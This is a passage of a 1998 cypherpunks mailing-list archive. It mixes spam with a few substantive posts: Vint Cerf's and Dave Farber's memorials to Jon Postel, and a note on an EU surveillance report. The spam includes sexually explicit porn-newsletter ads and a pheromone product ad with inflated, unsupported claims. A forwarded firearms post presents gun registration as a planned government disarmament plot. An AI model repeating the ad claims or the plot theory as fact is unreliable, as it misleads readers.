the addition of a sales clerk!!!!!

SECURE REAL-TIME ON-LINE TRANSACTIONS make it as easy as possible for your
customers to purchase your products or services.  
We use SSL SECURITY (best on the NET today).

Now tell me if this doesn't sound intriguing, lets say a customer visits
your web site and decides they want to buy your product(s) or service(s). 
They would simply enter their credit card information and receive an
approval WITHIN 5 SECONDS.  That's all there is to it!!!  

>From that point on, the sale is complete and the money will be directly
deposited into your business checking account within 24 to 48 hours. 
So you will have LIQUID ASSETS AVAILABLE ALMOST IMMEDIATELY!!!!   
Your customer will be e-mailed a receipt and you will be e-mailed an
invoice slip, all instantaneously.  Now, since this program is automated
for 24 hours a day 7 days a week, you will be receiving orders and making
money in your sleep!!!!!
IT'S JUST THAT EASY!!!!

WHAT MAKES US SO SPECIAL?????

* We process over $4 Billion in credit card transactions every year. 
* We have over 100,000 merchants online and growing.
* We offer secured on-line real time transactions.
* We offer 24 hour customer service 7 days a week in 17 different languages.
* We offer complete training and installation through our technical support group.
* We offer a life time warranty and unlimited upgrades.
* We help make money for your company and your customers.

>>>>>CONTACT INFORMATION<<<<<

Just place a toll free phone call to 1-800-600-0343 ext.2310 .  
 
Once you call, an account executive will contact you within 24 hours to discuss 
your options, answer your questions, and start you on your way to financial success.
 
DON'T DELAY!!!! ACT TODAY!!!
____________________________________________________________________________________
To be Removed send and email to merchant89@mailcity.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DizzyG1616@aol.com
Date: Fri, 16 Oct 1998 22:22:28 -0700 (PDT)
Subject: Do you gamble, or want to know how?!
Message-ID: <70d5743c.362821a6@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: DizzyG1616@aol.com
Subject: Do you gamble, or want to know how?!
From: DizzyG1616@aol.com
Date: Sat, 17 Oct 1998 00:44:01 EDT

<a href="http://members.theglobe.com/mulahnow/lotto.html">Do you gamble, or
want to know how?! CLICK HERE! </a>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED SAT OCT 17 <stuffed@stuffed.net>
Date: Sat, 17 Oct 1998 05:24:31 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: EVEN MORE FREE PORN: STUFFED HAS 10 LINKS TO 100S OF FREE PICS, NEW EVERY DAY
Message-ID: <19981017071000.11812.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ SATAN'S CIRCUS
+ SIMPLY STUNNING
+ EURO SLUTS
+ ZEE ASS
+ NAUGHTY LADY
+ CAILEY'S PRECIOUS PIX
+ ANAL CLIMAX
+ MATURE WOMEN
+ MAD PUSSY
+ ALL DAY PUSSY PARTY
+ BONUS PIC 1 -> http://www.stuffed.net/home/13035.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/19998.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/21450.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/20953.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/32403.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <billstewart@att.com>
Date: Sat, 17 Oct 1998 23:11:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: More on Postel
Message-ID: <36298670.B1A@att.com>
MIME-Version: 1.0
Content-Type: text/plain


Subject: IP: Remembrance/postel
From: Dave Farber [farber@cis.upenn.edu]

I, and others I fear, have spent a sleepless night after hearing of the
death of Jon Postel last night. This morning there was a  note in my
mail box from Vint Cerf that said many of the things I feel at this
time. I asked him for permission to send on which he granted.

I also remember Jon. I was his primary thesis advisor along with Jerry
Estrin and I remember with fond memories the months spent closely
working with Jon while his eager mind developed the ideas in back of
what was a pioneering thesis that founded the area of protocol
verification.  Since I was at UC Irvine and Jon at UCLA we used to meet
in the morning prior to my ride to UCI at a Pancake House in Santa
Monica for breakfast and the hard work of developing a thesis. I gained
a great respect for Jon then and 10 pounds of weight.

I will miss him greatly. Jon was my second Ph.D. student. The first,
Philip Merlin, also died way before his time.

Dave

________________________________________________________________________

 October 17, 1998

I REMEMBER IANA

Vint Cerf

A long time ago, in a network, far far away, a great adventure took
place...

Out of the chaos of new ideas for communication, the experiments, the
tentative designs, and crucible of testing, there emerged a cornucopia
of networks. Beginning with the ARPANET, an endless stream of networks
evolved, and ultimately were interlinked to become the Internet. Someone
had to keep track of all the protocols, the identifiers, networks and
addresses and ultimately the names of all the things in the networked
universe. And someone had to keep track of all the information that
erupted with volcanic force from the intensity of the debates and
discussions and endless invention that has continued unabated for 30
years. That someone was Jonathan B. Postel, our Internet Assigned
Numbers Authority, friend, engineer, confidant, leader, icon, and now,
first of the giants to depart from our midst.

Jon, our beloved IANA, is gone. Even as I write these words I cannot
quite grasp this stark fact. We had almost lost him once before in 1991.
Surely we knew he was at risk as are we all. But he had been our rock,
the foundation on which our every web search and email was built, always
there to mediate the random dispute, to remind us when our documentation
did not do justice to its subject, to make difficult decisions with
apparent ease, and to consult when careful consideration was needed. We
will survive our loss and we will remember. He has left a monumental
legacy for all Internauts to contemplate. Steadfast service for decades,
moving when others seemed paralyzed, always finding the right course in
a complex minefield of technical and sometimes political obstacles.

Jon and I went to the same high school, Van Nuys High, in the San
Fernando Valley north of Los Angeles. But we were in different classes
and I really didn't know him then. Our real meeting came at UCLA when we
became a part of a group of graduate students working for Prof. Leonard
Kleinrock on the ARPANET project. Steve Crocker was another of the Van
Nuys crowd who was part of the team and led the development of the first
host-host protocols for the ARPANET. When Steve invented the idea of the
Request for Comments series, Jon became the instant editor. When we
needed to keep track of all the hosts and protocol identifiers, Jon
volunteered to be the Numbers Czar and later the IANA once the Internet
was in place. 

Jon was a founding member of the Internet Architecture Board and served
continuously from its founding to the present. He was the FIRST
individual member of the Internet Society I know, because he and Steve
Wolff raced to see who could fill out the application forms and make
payment first and Jon won. He served as a trustee of the Internet
Society. He was the custodian of the .US domain, a founder of the Los
Nettos Internet service, and, by the way, managed the networking
research division of USC Information Sciences Institute.

Jon loved the outdoors. I know he used to enjoy backpacking in the high
Sierras around Yosemite. Bearded and sandaled, Jon was our resident
hippie-patriarch at UCLA. He was a private person but fully capable of
engaging photon torpedoes and going to battle stations in a good
engineering argument. And he could be stubborn beyond all expectation.
He could have outwaited the Sphinx in a staring contest, I think.

Jon inspired loyalty and steadfast devotion among his friends and his
colleagues. For me, he personified the words "selfless service." For
nearly 30 years, Jon has served us all, taken little in return, indeed
sometimes receiving abuse when he should have received our deepest
appreciation. It was particularly gratifying at the last Internet
Society meeting in Geneva to see Jon receive the Silver Medal of the
International Telecommunications Union. It is an award generally
reserved for Heads of State but I can think of no one more deserving of
global recognition for his contributions. 

While it seems almost impossible to avoid feeling an enormous sense of
loss, as if a yawning gap in our networked universe had opened up and
swallowed our friend, I must tell you that I am comforted as I
contemplate what Jon has wrought. He leaves a legacy of edited documents
that tell our collective Internet story, including not only the
technical but also the poetic and whimsical as well. He completed the
incorporation of a successor to his service as IANA and leaves a lasting
legacy of service to the community in that role. His memory is rich and
vibrant and will not fade from our collective consciousness. "What would
Jon have done?" we will think, as we wrestle in the days ahead with the
problems Jon kept so well tamed for so many years. 

There will almost surely be many memorials to Jon's monumental service
to the Internet Community. As current chairman of the Internet Society,
I pledge to establish an award in Jon's name to recognize long-standing
service to the community, the Jonathan B. Postel Service Award, which is
awarded to Jon posthumously as its first recipient.

If Jon were here, I am sure he would urge us not to mourn his passing
but to celebrate his life and his contributions. He would remind us that
there is still much work to be done and that we now have the
responsibility and the opportunity to do our part. I doubt that anyone
could possibly duplicate his record, but it stands as a measure of one
man's astonishing contribution to a community he knew and loved.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED SUN OCT 18 <stuffed@stuffed.net>
Date: Sun, 18 Oct 1998 03:22:46 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: EVEN MORE FREE PORN: STUFFED HAS 10 LINKS TO 100S OF FREE PICS, NEW EVERY DAY
Message-ID: <19981018071001.15053.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ DISCO XXX
+ FREE GIRL SEX
+ NAKED N NASTY
+ GENERATION PORN
+ VIRTUAL EXTACY
+ TALENT SEARCH
+ ADRIA'S FRIENDS
+ STIFF ONE EYE
+ SWEET ASIAN PUSSY
+ BITCHES IN HEAT
+ BONUS PIC 1 -> http://www.stuffed.net/home/7649.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/31232.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/2818.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/2708.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/28665.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 18 Oct 1998 04:36:31 -0700 (PDT)
To: cypherpunks@toad.com
Subject: 2nd Report on Political Control Technologies
Message-ID: <199810181136.HAA08061@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Forward:

Date: Sun, 18 Oct 1998 11:26:38 +0200
To: jya@pipeline.com
From: Marie-Jose Klaver <klaver@nrc.nl>
Subject: Second report An Appraisal of Technologies of Political Control

I'm a Dutch journalist, working for NRC Handelsblad, one of the major
newspapers in the Netherlands. I've been reporting about the STOA 
report An Appraisal of Technologies of Political Control since last 
February.

A second report came out last month. I got a copy a few days ago from 
the Omega Foundation and had an article about it in NRC Handelsblad 
today. This second report has interesting information about the so called 
EU-FBI global surveillance plan. According to a secret memorandum 
the EU countries have agreed with the FBI to intercept all European 
datacommunication. To do this some EU countries like Holland and 
Germany changed their laws to make broad wiretapping and 
interception of Internet and other datacommunication possible. 
Germany changed its constitution in the beginning of this year and in 
Holland a law was made and accepted by both chambers of the
Parliament that obliges all firms with computer and communication 
networks (providers, telco's, newspapers etc.) to make their systems 
tappable. 

You can read the second report at:

   http://www.nrc.nl/W2/Lab/Echelon/stoa2sept1998.html  [104K]


Marie-Jose Klaver

NRC Handelsblad

http://www.nrc.nl/W2/Lab/Echelon 

----------

There's much new information in the report, especially on
the US export of political control technologies which 
complements Amnesty International's recent critique of 
US violations of human rights, as well as the US Bureau 
of Prisons reorganization, all to accommodate the rise in
domestic and foreign freedom fighters, oops, terrorists,
as global Justice and Defense agencies characterize 
naysayers to bloated organs of dysfunctional cracies.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ventas@miller.com.mx
Date: Sun, 18 Oct 1998 07:03:50 -0700 (PDT)
To: ventas@miller.com.mx
Subject: >>Dinero con Traducciones!<<
Message-ID: <19981018143140759.AAS234@miller.com.mx>
MIME-Version: 1.0
Content-Type: text/plain


///////////////////////////////////////////////////////////////////////////////
This Message was Composed using Extractor Pro Bulk E- Mail Software. If 
you wish to be removed from this advertiser's future mailings, please reply 
with the subject "Remove" and this software will automatically block you 
from their future mailings.
////////////////////////////////////////////////////////////////////////////////

Usted que se dedica a realizar traducciones de idiomas; o que de alguna manera
se encuentra relacionado con esta profesion, el siguiente mensaje puede darle
a ganar bastante dinero:

GANE MILES DE DOLARES COMERCIALIZANDO SU SERVICIOS POR INTERNET.
Utilice el Correo Masivo, Los Clasificados y los Grupos de Discusion para publicitar sus
productos o servicios y obtener  GRANDES INGRESOS de forma inmediata. Solicite informes GRATIS insertando "BIZ" en el subject/asunto o visite nuestra pagina en: 

                                                http://www.miller.com.mx/biz.html

 A todos nuestros visitantes se les obsequiara un programa software con el que puede
 disear su propia pagina Web en 15 minutos. Busque este programa bajo la liga "Software GRATIS"

Saludos

Alberto Martinez






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: co84772@yahoo.com
Date: Wed, 21 Oct 1998 13:44:30 -0700 (PDT)
Subject: your web site
Message-ID: <199810212041.NAA12066@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



            We'll Submit Your Site To 

                    Over 900

     Search Engines, Directories, & Indices

      For A "One Time Cost" Of Only $39.95


     ***  100% Money Back Guarantee  ***

*** Immediately Increase Your Sites Exposure ***

 For Less Than 4 Cents Each We Will Submit Your
 Web Site To Over 900 Of The Net's Hottest Search 
 Engines, Directories & Indices.

 If your site isn't listed in the Search Engines,
 how can people find you to buy your products 
 or services?
 
 For just $39.95 we'll take the work load off your
 back instead of you trying to do it manually which
 can take days to do.

 We're the professionals that are here to help
 you have a shot at having a successful marketing
 experience with the internet.

 You know as well as we that your time is
 best utilized managing your business and not
 sitting at some keyboard hours upon hours
 trying to save less than 4 cents for each  
 submission. See how it's kind of crazy to try
 to tackle this on your own.  It's just not 
 cost effective to try to do this yourself to
 save just $39.95.

 See why businesses both large and small have
 come to us to utilize our services.  Hotels, 
 Motels, On-Line Stores, Travel Agents, Colleges, 
 Universities, Governments, Fortune 500 companies,
 Movie Studios, Chambers Of Commerce and many, 
 many more.  Shouldn't you give us a call now?

 To Learn More, Call Us At The Numbers Below.
 
 Call us toll free at (800) 771-2003 in the USA
 or Canada or (916) 771-4739 outside the USA
 and we'll provide you with all the necessary
 information to get you submitted Right Away... 















REMOVE INSTRUCTIONS

To be removed from our email list, please return 
this message with the word, "remove" (without 
quotes) in the subject line.
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root@sf-dnpqi-012.compuserve.net (8.9 Cent/Min. NO SWITCHING REQUIRED)
Date: Sat, 17 Oct 1998 19:31:04 -0700 (PDT)
To: root@sf-dnpqi-012.compuserve.net
Subject: 8.9 cent/min: Dial 1010948 = FREE Registration Offer.
Message-ID: <199810181927.MAA16645@sf-dnpqi-012.compuserve.net>
MIME-Version: 1.0
Content-Type: text/plain



* 8.9 Cent/Minute FLAT RATE (24/7) Long Distance Rate

* NO NEED TO CHANGE YOUR CURRENT LONG DISTANCE CARRIER:

* 1-800-959-1469 = Toll Free Automated 1010948 Registration Line


Dear Telecommunications Customer,

Keep your current long distance carrier, and after placing a quick toll
free registration phone call from the phone you wish to register, you
may dial 1010948, then 1+ the area code/phone number to enjoy a NO
NONSENSE, 8.9 cent per minute, 24 hour per day, 7 day per week, rate on
all state-to-state calls.

COMPARE & SAVE up to 60%: the average national interstate calling
rate offered is more than 20 cents/min.  You'll save up to 60% by just dialing
our 7 digit access code before each long distance call you place.

                            ******* IMPORTANT:  *******

YOU MUST first REGISTER your phone number (NOT switch carriers) by
calling TOLL FREE:

                              1-800-959-1469

Once you have tried the service and you are happy with it, *IF YOU
WISH*, you may switch over (so you won't have to dial the 1010948 access
code) by dialing: 1-800-959-1423.

Otherwise, simply dial 1010948 AFTER you have REGISTERED each phone
number you wish to call from, by calling 1-800-959-1469 NOW!!!

All calls will be billed on your local telephone bill.

Thank you for your time. We are sure you'll enjoy the crystal-clear, and
most importantly, economical service.

After all... it's YOUR money!



####################################

 TO BE REMOVED FROM OUR DATABASE,
 CALL TOLL FREE 1-888-894-4296 24/7

 At the tone, slowly and clearly
 state your email address.

 This toll free remove line may be 
 accessed only ONE TIME per
 originating phone number.

####################################






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sun, 18 Oct 1998 10:19:36 -0700 (PDT)
To: "jf_avon@citenet.net>
Subject: IMPORTANT!  Fwd: Social Engineering & C68
Message-ID: <199810181718.NAA22024@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi!

My name is Jean-Francois Avon.

Almost all of you who will read this message know me personnally.

I forward this message to you for I believe that it is of *great*
importance.  The message discuss things that *will* affect your life in one
way or another. PLEASE take the time to read it.

The implications of what is discussed in this document will affect
*everybody*.

PLEASE!  DO READ IT COMPLETELY!

Jean-Francois Avon


==================BEGIN FORWARDED MESSAGE==================
>Date: Sun, 18 Oct 1998 10:37:30 -0700
>From: Dan MacInnis <dan.louise@sympatico.ca>
>Reply-To: dan.louise@sympatico.ca
>To: cdn-firearms-digest@broadway.sfn.saskatoon.sk.ca
>CC: mkhughe@north.nsis.com, jf_avon@citenet.net
>Subject: Social Engineering & C68

Let me begin by commenting I know this is not a 'chat' digest, but the
question was raised here about Quebec/Maritime involvement if fighting
C68 [the new firearms registration bill].  To be fair, there is quite a bit
of work being done by individuals, but government is mute down there, and
for ecomonic reasons, must be.

The reluctance or simply because the populance had no personal arms of
men and women to fight back when their wives, children, possessions etc.
were  being taken away is however, as in Nazi Germany and Kosovo today,
is, I suggest, a major plank in Social Engineering of a Society.

>From this point I will probably be branded as a "radical'.  So be it.  I
am educated in Engineering and Philosophy, the former teaches system and
the latter teaches thinking on, I would argue, another scale.

The new so called 'Global' economy will, and already has, caused major
social upheaval.  People who were middle class a few short years ago are
now on the streets or almost there due to the relocaction of work to
countries with a lower wage scale. Mexico, India, two of which I have
first hand knowledge, the wages are less than %10 of North American
rates.

Workers and management both were'are being 'let go', out of a source of
income.  The stock market was inundated with large sums of cash, the
source was the money paid to let go people, their severance package.
Hence, the inflated price of shares, which the market is just now
correcting, to the detriment of retirement payouts from Mutual Fund to
these laid off workers.  Their future is bleak, to put it mildly.
Farmers must be, by international trade laws, cut off from government
support and assistannce, to give an example, hog and milk subsidies.
So they face a bleak future in Canada.  Quebec fought hard for Free
Trade, until the dairy and hog farmers read the fine print.  Now we had
a milk strike, annd as I write, the hog farmers in Quebec are raising
Hale.

Jean Francois Avon wrote in response to my earlier diatribe on
Jews/Kosovians(I hope he copied this Digest) that Quebec Separatists
would be afraid of an armed populace.  I suggest he is correct.
So too are the federal and eastern Canadian provincial governments
afraid of guns in the hands of civilians.  They see them as weapons
which could be used against them and the establishment as the economy
changes and more and more middle class people, farmers, fishermen and
former managers reach the lower ranks of income and living conditions.

In Canada, we rank social standing by job/income/education to do a job.
We rated fur trappers at the bottom, because it payed poorly and
required little formal education to perform.

Tie in to Bill C68?  Well, Allan Rock let the cat out of the bag. When
he was briefed after becoming Minister of Justice, it was explained to
him that the program to disarm civilians began when Free Trade/Global
Economy talks were in their early stages, was running behind shedule.
In his jubulance, determined to 'get the job done', where Mulroney had
slowed down after an aggressive start, he blurted out the program on
live TV. 'Only police and the military should have guns'.

In the opinion of the various goverments, including Quebec, Ottawa and
some provinces, the program must be complete, and must be completed
soon.  Farmers, as they lose their farms to financial institutions,
fishermen, as they lose thier boats, certain interests in Quebec as they
lose everything due to separation, may fight back.  It is therefore
critical that they do not have access to arms, as a means of defence or
aggression.

The War Measures act is gone, replaced.  A legal means had to be
manufactured to remove guns from the people.  Hence, C68 is a good
beginning.  It allows confiscation of any firearms so deemed by the
incumbent government later on.  No, my friends, Ottawa is not stupid,
this is a well thought out plan, and appears to be working, as they use
mass media on the population, to change public opinion to their side,
i.e., guns are dangerous especially to women and children.  In fact,
firearms in the hands of civilians are dangerous, but to repressive
governments from a displaced populace.  As more and more Canadians find
everything they worked for threatened, some MIGHT fight back, and shoot
the Bailiff's from the Banks and the police sent to protect them when
they re-possess their property and throw them, literally, on the
streets, on into their relatives homes.

Registration? Use of the harsh Criminal Code, jail, for
non-compliance??  Necessary, in Ottawa's view.  Get the job begun
earlier finished, then they can go on the the greater plan, more relaxed
when people have no means of defence or rebellion.
When you live on the streets, there is no place to hide a gun.  Not to
sound trite, but this will test 'unsafe storage' laws to the limit.

If the Supreme Court judges have been properly briefed on the Social
Engineering aspects of C68, we do not have a chance in Hell in the
courts. Then, we will have a search and seizure, after 2003, to actively
find and confiscate unregistered and illegal (by now) guns on farms, in
houses, examples made in the Press of a few, and the game is over.

Is this gloom and doom from me, or a realistic analysis of the
situation?  You decide, but at least think about it from a broader angle
than simply telling Ottawa how many, the serial number and storage place
of your firearms today.

We need only to look at the history of Scotland to see Quebec today and
the ROC tomorrow.  And C68 plays a huge role in this.



===================END FORWARDED MESSAGE===================


Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED MON OCT 19 <stuffed@stuffed.net>
Date: Mon, 19 Oct 1998 05:18:39 -0700 (PDT)
To: (OVER 100 FREE PICS DAILY!)
Subject: EVEN MORE FREE PORN: STUFFED HAS 10 LINKS TO 100S OF FREE PICS, NEW EVERY DAY
Message-ID: <19981019071000.3889.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ VERY WET FETISH SITE
+ XXX PUSSY
+ TASHA'S TERRIBLE SECRET
+ PURE PIX
+ REAL HOT SEX
+ STIFF ONE EYE
+ WAVE DREAM
+ WACK OFF ZONE
+ ASIAN SLUTS
+ ANAL CLIMAX
+ BONUS PIC 1 -> http://www.stuffed.net/home/2263.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/9698.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/16955.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/17231.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/24927.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: totospitter@3253137429
Date: Mon, 19 Oct 1998 15:41:45 -0700 (PDT)
To: chico@3253137429
Subject: Hillary's last ditch effort potion!
Message-ID: <199810192241.PAA11517@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


BOOST YOUR SEX APPEAL AND CHANGE YOUR SOCIAL AND SEX LIFE FOREVER. 

SCIENCE AND NATURE'S SEXUAL SECRET WEAPON! 

Scientists have isolated the natural Human male/female Pheromone attractants 
and they are NOW available to YOU, legally, in the US. 

ATTRACT THE OPPOSITE SEX LIKE NEVER BEFORE ! 
IT'S GUARANTEED, or you pay nothing! 


PHEROMONES in the News! 

>From the NY Times to the LA Times. USA Today, The Wall Street Journal, Psychology Today, 20/20, Hard Copy, Single Living, Medical Tribune, Philadelphia Inquirer, Dateline, Discovery, Hustler, Playboy, Rocky Mountain News, McCalls, Penthouse, Cosmopolitan, BBC-TV, Colordao Telegraph, GQ, Time, Redbook, Fortune Magazine, and more.  Radio and Television Stations worldwide.  All have reported the scientific findings amidst excitement, controversy, commotion and thrill about pheromones and their potential use. 


The Press Has Said it Better Than We Can. 

"PUT IT TO THE TEST" MERIDIAN TV: 
Sold extensively in the UK, phermomones were tested live on television in the UK, when the unknowing female presenter was VERY ATTRACTED to one of the twin guys,  he was wearing "Androstenone Pheromone"  but she did not know this, and did not know why she was attracted to him ! 

US NEWS and WORLD REPORTS 
"The key to starting a love affair might be right under your nose. Scientists have just announced the discovery of a virtual sixth sense, a tiny organ in the nasal cavity that responds to chemicals known as pheromones. These natural substances are thought to play a role in basic human emotions such as fear, hunger--and love." 
FORTUNE MAGAZINE:  
"An imaginative University of Utah anatomist named David L. Berliner was working with substances that occur in human skin. When he left some of the extracts in open vials around the lab, he noticed a sudden, puzzling rise in camaraderie among a previously acrimonious group of researchers working with him. When he changed the extracts a 
few months later, the group resumed its contentious ways. Berliner froze and saved the extracts. 
Nearly 30 years later, ...  thanks to a method of containing drugs and cosmetics inside tiny, spongelike polymer spheres, he returned to the subject. In 1989 he ... has isolated the suspected good-fellowship pheromones -- behavior-controlling substances similar to those already known to stimulate sexual activity in animals. (One whiff of a pheromone called aphrodisin from a female hamster and a male is ready to mate.) 

On March 3, 1998 FOX Affiliate, WSVN in Miami did a story on Pheromones, stating, "If you're looking for love, we've got a potion for passion." ...  "Tonight, a secret weapon to attract the opposite sex.  Researchers developing their own passion potion. Ever been attracted to someone but weren't really sure why? .... More and more research is pointing to chemicals these days.... undetectable chemicals... pheromones ... a clear odorless liquid" 

Customers Say: 

"... works as advertised, best product of its' kind" 

I've always had trouble meeting women-then I tried your product.  Now girls come up to me and introduce themselves all the time! I'd like to know if your product is available in a larger quantity so I can make sure I'm never without it! 
-Dave J 

I've been driving a tractor trailer for about 6 years and I'm on the road all the time. It's been impossible to meet women until I tried pheromones.  Now every truck stop I pull into I meet new women, and many of them ask me out. Thanks! 
-Tom on the Road Again, 

WHAT ARE PHEROMONES? 

Pheromones are a naturally occurring chemical compound found in all insects, all animals, and in humans. When pheromones are secreted they dictate sexual behavior and attract the opposite sex.  Be careful. Animal pheromones do NOT attract humans. 

Have you ever wondered why people who are not particularly attractive seem to attract dates like flies to honey?  They seem to have some "chemical attraction" about themselves. Some call it animal magnetism. It may be pheromones.  Now you can have that "chemical attraction" whenever you want. 

PHEROMONES - THE FACTS 

       Pheromones are natural chemicals which play an important role in sexual communication. 

       Animals, including humans release chemicals in tears, saliva and perspiration. These chemicals send signals relating to mood and health to the subconscious awareness.  One theory is that the dominant male will exude more of these chemical attractants than a submissive or weaker male.  This chemical attracts more females to him.  It is similar for woman attracting men. This natural attractant can also contribute to more 
intense excitement during love making (sexual foreplay and sexual intercourse). Pheromones may also contribute to the dating phrase, "chemical attraction" that we all talk about.  WSVN-TV (March 3, 1998) "Ever been attracted to someone but weren't really sure why? .... More and more research is pointing to chemicals these days.... undetectable chemicals... pheromones ... a clear odorless liquid" 


MORE RESEARCH AND REFERENCES: 
Following is some research done on products made by our manufacturer, and bottled under a different name.  It contains the same pheromone type and content as Hi-Octane
http://www.angelfire.com/fl/beaches69/index.html 



ABOUT OUR PRODUCT: 

Hi-Octane (tm) 

.. is made up of PHEROMONES suspended in witch hazel.. This product is designed to be added to your favorite cologne or perfume. 

.. contains both male and female PHEROMONES. Nature never intended for 
just one PHEROMONE to be present; but two, male and female. Our manufacturering process uses both PHEROMONES in ALL our products. This will not attract same sex; 
but works as nature intended, attracting the opposite sex. 

.. comes in 1/8 oz. Bottle with a small funnel so you can easily pour it into 
your cologne or perfume. One 1/8 oz. bottle is enough to mix with 4 to 8 oz of 
your favorite perfume product.  

Similar pheromone products have been sold for up to $100 elsewhere. We sell the the strongest product on the market today for only $39.95. 

BUY two -- get one free. 

The world's largest manufacturer of Pheromones, MC Marble, now manufactures Hi-Octane (tm), a pheromone prodcut that is the "Most Powerful sexual attractant on the Market today." 

HI_OCTANE is made with two powerful synthesized human 
pheromones, Alpha-Androstenol and Alpha-Androstenone. 

HI-OCTANE  will attract the opposite sex of the wearer.  McCall's magazine writes 
"...pheromones can improve one's love life, pheromones send out subconscious 
scent signals to the opposite sex that naturally trigger romantic feelings." 

HI-OCTANE  according to the manufacturer, may also intensify sex, by increasing sexual pleasure and endurance of both partners, and creating a higher sexual ecstasy. Individual results may vary.   One private study claims that pheromones don't work for everyone. 75% of those trying it had success.  Isn't it worth trying? 

HOW TO ORDER Hi OctaneTM 

Hi OctaneTM is available from Euphoria Products. 

A 1/8 oz. bottle with a convenient funnel (to be added to your favorite perfume) is 
$39.95. Mix 1/4 of the bottle with every 2 oz of your favorite product. One 1/8 oz. bottle is enough to mix with 4 to 8 oz of your favorite product. 

                         *** 

  For a limited time, when you order two bottles (up to a two month's supply) of Hi Octane(tm), you'll get a third bottle ABSOLUTELY FREE. 

                         *** 

Please add $3.00 shipping and handling per order. (regardless of how many bottles you order, you pay only $3.00 total!) 

UPS Second Day Air Delivery is available for an additional $9.00 per order.  Overnight, add $15.00 per order. 

Florida residents, please add applicable sales tax. 

For orders from outside of the US only ground shipping is available for $15. 

Our manufacturing facility offers the STRONGEST pheromones on the market today. Our manufacturing facility assures you that Hi-Octane will be always contain the male and female pheromones, the way nature intended it, to best attract the opposite sex for you. It is and will always be manufactured with the finest ingredients to assure your satisfaction. 



                        SATISFACTION GUARANTEED 

Try Hi OctaneTM risk-free. Your satisfaction is unconditionally guaranteed. If you do not find you are meeting and dating and scoring with more people of the opposite sex after using High OctaneTM for 30 days, simply return the unused portion of your order at any time for a full refund--no questions asked. 



Call 520-453-0303 Extension 202,  24 hours/day, 7 days/week for credit card orders. Have your MasterCard, Visa, American Express, and Discover Card  ready and say, " I would like to order ___ bottles of High Octane." 

If you would like to order by mail, you can send in a check or money order, or credit card information,  along with your name and street address (no PO Boxes please) and a day time phone number to: 

                         Euphoria Products Dept. 202 
                    1859 No Pine Island Rd. Suite #133
                            Plantation, FL 33322 












